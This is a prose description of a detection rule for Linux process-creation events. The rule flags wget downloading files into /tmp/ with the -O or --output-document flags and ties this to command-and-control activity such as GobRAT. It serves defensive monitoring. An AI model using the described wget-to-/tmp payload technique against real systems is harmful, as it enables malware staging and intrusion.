This detection rule focuses on identifying instances where the wget utility is used to download files into suspicious directories, specifically targeting the /tmp/ directory on Linux systems. The use of wget to fetch resources can be indicative of malicious activities, especially if the files are downloaded to temporary locations that are often overlooked by users and administrators. The detection is triggered when the command contains specific flags, such as '-O' or '--output-document', combined with the presence of '/tmp/' in the command line, suggesting that the downloaded file may compromise the system's security. The rule checks for process creation events and aims to identify potential Command and Control (C2) behaviors indicative of malware, such as GobRAT, which has been referenced in multiple security blogs. False positives may arise from legitimate system activities, particularly from unknown scripts or processes that also use wget.